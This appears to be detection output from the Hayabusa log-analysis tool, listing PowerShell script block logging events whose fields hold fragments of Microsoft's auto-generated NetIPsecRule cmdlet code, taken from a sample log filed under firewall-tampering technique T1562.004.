[object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecRule' -Alias '*' function Remove-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$tr",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecRule' -Alias '*' function Remove-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$tr",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"ue)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmd",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"ue)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] 